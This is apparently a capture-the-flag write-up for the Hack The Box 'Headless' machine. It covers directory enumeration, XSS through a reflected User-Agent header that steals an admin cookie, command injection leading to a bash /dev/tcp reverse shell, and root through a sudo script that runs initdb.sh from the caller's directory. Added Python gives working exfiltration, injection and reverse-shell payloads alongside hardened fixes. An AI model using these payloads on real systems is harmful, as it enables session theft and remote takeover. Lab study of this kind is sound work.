Once we know port 5000 is open, we scan it with dirsearch:
dirsearch -u http://10.129.36.41:5000

/usr/share/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

dirsearch v0.4.3

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11723
Output: /home/replican/Desktop/Prod/HackTheBox/machine/Headless/reports/http_10.129.36.41_5000/__24-05-18_22-02-29.txt
Target: http://10.129.36.41:5000/

[22:02:29] Starting:
[22:04:16] 401 - 317B - /dashboard
[22:05:50] 200 - 2KB - /support

Task Completed
/dashboard answers 401 Unauthorized, so we move on to /support.
After a while I notice that the site also sets a cookie.
Exploitation
As with the usual CTF pattern (a cookie, an admin page, a form with no file upload), this smells like XSS.
We put our XSS payload straight into the form, but it gets blocked.
However, our User-Agent is reflected as well. So we can tamper with the User-Agent header in Burp Suite and place the XSS payload there to steal the cookie (we assume an admin in the backend automatically reviews our form submission).
Our payload works perfectly. Now we start a Python http.server to watch the request log.
After some time, we receive a request carrying the admin's cookie.
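The cookie-stealing step above, written out as an added example (this is not code from the original writeup). It builds the payload that goes into the User-Agent header, runs the same kind of listener as `python3 -m http.server` but parses the exfiltrated cookie instead of only logging the request, and can POST the support form with the payload. The listener address, the form field names and the cookie names in the demo are assumptions; only the target URL comes from the page.

```python
"""XSS cookie exfiltration through a reflected User-Agent header.

Added example, not code from the original writeup. The listener address,
the support-form field names and the demo cookie values are assumptions.
"""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, quote, urlencode, urlsplit

LISTENER = "10.10.14.5:8000"                    # assumption: attacker box
TARGET = "http://10.129.36.41:5000/support"     # from the page


def build_user_agent_payload(listener: str) -> str:
    """Payload placed in the User-Agent header. When the admin's browser
    renders the reflected header, it requests our listener with the
    cookie jar URL-encoded in the `c` query parameter."""
    return (
        '<script>new Image().src="http://' + listener + '/?c="'
        '+encodeURIComponent(document.cookie)</script>'
    )


def parse_exfil_request(request_path: str) -> dict:
    """Turn the path of an exfil hit (`/?c=name%3Dvalue%3B...`) into a
    {cookie name: value} dict. Unrelated hits (e.g. /favicon.ico) give {}."""
    raw = parse_qs(urlsplit(request_path).query).get("c", [""])[0]
    cookies = {}
    for part in raw.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


class ExfilHandler(BaseHTTPRequestHandler):
    """Listener that records every cookie jar delivered by the payload."""
    captured = []   # list of dicts, one per victim hit

    def do_GET(self):
        cookies = parse_exfil_request(self.path)
        if cookies:
            ExfilHandler.captured.append(cookies)
            print(f"[+] cookie from {self.client_address[0]}: {cookies}")
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):   # silence the default per-request log line
        pass


def submit_with_payload(target: str, listener: str, form: dict) -> int:
    """POST the support form with the payload in User-Agent (what we do by
    hand in Burp). Returns the HTTP status. Field names are assumptions."""
    req = urllib.request.Request(
        target, data=urlencode(form).encode(),
        headers={"User-Agent": build_user_agent_payload(listener)})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def simulate_admin_visit(cookie_jar: str) -> dict:
    """Offline demo: start the listener on a random loopback port and act as
    the victim browser executing the payload (constructed, no real target).
    Returns the cookies the listener captured."""
    srv = HTTPServer(("127.0.0.1", 0), ExfilHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        # quote(safe="") encodes '=', ';' and ' ' like encodeURIComponent does
        url = f"http://127.0.0.1:{srv.server_address[1]}/?c={quote(cookie_jar, safe='')}"
        with urllib.request.urlopen(url, timeout=5) as resp:
            resp.read()
        return ExfilHandler.captured[-1]
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(simulate_admin_visit("session=abc123; theme=dark"))
    # Against the box: run the listener on LISTENER, then
    # submit_with_payload(TARGET, LISTENER, {"fname": "a", "lname": "b",
    #                     "email": "a@b.c", "phone": "1", "message": "hi"})
```

The payload uses `new Image().src` rather than `document.location` so the admin's page is not visibly redirected, and `encodeURIComponent` so a `;`-separated cookie jar survives the trip as a single query parameter.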
With that cookie we get into the dashboard. The page mentions "system", so we assume the form runs a command and try command injection.
And yes, it is command injection: appending ;ls lists the files.
Straight to a reverse shell from revshells.
And we get the user flag.
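The dashboard bug, as an added example that is not the box's own code: a handler that interpolates the form value into a shell command (the `;ls` behaviour seen above) next to a hardened version that allow-lists the input and calls the program without a shell, plus the reverse-shell payload as it would be sent. The `date` field name and the `echo` stand-in for the real report script are assumptions; `lhost`/`lport` are placeholders.

```python
"""Command injection in the dashboard report form: vulnerable handler beside
a hardened one. Added example, not the box's code. The `date` parameter name
and the `echo` stand-in for the real report command are assumptions.
"""
import re
import subprocess

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")   # the only shape a date may take


def run_report_vulnerable(date: str) -> str:
    """What the dashboard appears to do: paste user input into a shell
    command. A valid date followed by `;<cmd>` runs a second command."""
    cmd = f"echo report for {date}"          # stand-in for the real script
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_report_hardened(date: str) -> str:
    """Same feature, safely: reject anything that is not a date, then pass
    the value as a single argv element so no shell ever parses it."""
    if not DATE_RE.fullmatch(date):
        raise ValueError(f"rejected input: {date!r}")
    out = subprocess.run(["echo", "report", "for", date],
                         capture_output=True, text=True, check=True)
    return out.stdout


def hardened_rejects(date: str) -> bool:
    """True if the hardened handler refuses the input."""
    try:
        run_report_hardened(date)
    except ValueError:
        return True
    return False


def injection_payload(command: str) -> str:
    """Value of the `date` field that keeps the command valid and appends
    ours (URL-encode it before putting it in the POST body)."""
    return f"2024-05-18;{command}"


def revshell_payload(lhost: str, lport: int) -> str:
    """bash reverse shell as the injected command; lhost/lport are
    placeholders for the attacker's listener (nc -lvnp <lport>)."""
    return injection_payload(f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'")


if __name__ == "__main__":
    print(run_report_vulnerable(injection_payload("id")))   # second line is `id`
    print(hardened_rejects(injection_payload("id")))        # True
    print(revshell_payload("10.10.14.5", 4444))
```

The fix is not escaping: with `shell=True`, any quoting scheme is one encoding trick away from bypass, whereas an argv list and a strict allow-list leave nothing for a shell to interpret.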
Root Flag
Enumeration
Since this is a Linux box and an easy machine, I still use the Sliver C2 framework as usual.
First, we look at the mail.
From it we learn that we need to find the system check script (and create the database init script).
After that we run the following.
We have sudo access to the syscheck binary, which internally looks for a script named initdb.sh. We can simply write a script that runs /bin/bash, name it initdb.sh, and call syscheck with sudo.
Exploitation
After placing our payload we run syscheck (don't forget to start a listener first).
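Why this works, as an added example rather than the box's actual syscheck script: a privileged program that picks up `initdb.sh` from the caller's working directory will happily run whatever the unprivileged user dropped there. The block plants the same kind of helper the writeup uses, emulates that weak lookup, and shows the check a privileged script should do instead (root-owned, not group/other-writable, living in a fixed trusted directory). The emulated lookup, the trusted directory and the scratch location are assumptions.

```python
"""Privilege escalation through a helper script resolved from the caller's
working directory. Added example; the lookup emulates the behaviour the
writeup describes and is not the box's syscheck. The trusted directory and
scratch location are assumptions.
"""
import stat
import tempfile
from pathlib import Path
from typing import Optional, Tuple

HELPER = "initdb.sh"
TRUSTED_DIR = Path("/usr/local/sbin")            # assumption: where root keeps it
MALICIOUS_HELPER = "#!/bin/bash\n/bin/bash\n"   # what we drop: a root shell


def plant_malicious_helper(cwd: Path) -> Path:
    """What the unprivileged user does before `sudo syscheck`."""
    path = cwd / HELPER
    path.write_text(MALICIOUS_HELPER)
    path.chmod(0o755)
    return path


def find_helper_like_syscheck(cwd: Path) -> Optional[Path]:
    """The weak lookup: take `initdb.sh` from the current directory, which
    the caller of `sudo syscheck` controls."""
    candidate = cwd / HELPER
    return candidate if candidate.is_file() else None


def is_trusted_helper(path: Path) -> bool:
    """What a privileged script should verify before executing a helper:
    absolute path under a root-controlled directory, owned by root, and not
    writable by group or others. Any one failure is enough to refuse."""
    resolved = path.resolve()
    if resolved.parent != TRUSTED_DIR:
        return False
    st = resolved.stat()
    if st.st_uid != 0:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def demo() -> Tuple[bool, bool]:
    """Plant the helper in a scratch directory (constructed, standing in for
    the user's cwd) and return (weak lookup found it, trust check accepts it)."""
    with tempfile.TemporaryDirectory() as scratch:
        cwd = Path(scratch)
        planted = plant_malicious_helper(cwd)
        found = find_helper_like_syscheck(cwd)
        return (found == planted, is_trusted_helper(planted))


if __name__ == "__main__":
    found, trusted = demo()
    print(f"weak lookup executes our file: {found}")    # True
    print(f"trust check would execute it: {trusted}")   # False
```

The same lesson applies to the sudo rule itself: anything root runs on behalf of a user must only load code from paths that user cannot write to, and `sudo -l` output that names a script is worth reading for every relative path and every `$PATH` lookup inside it.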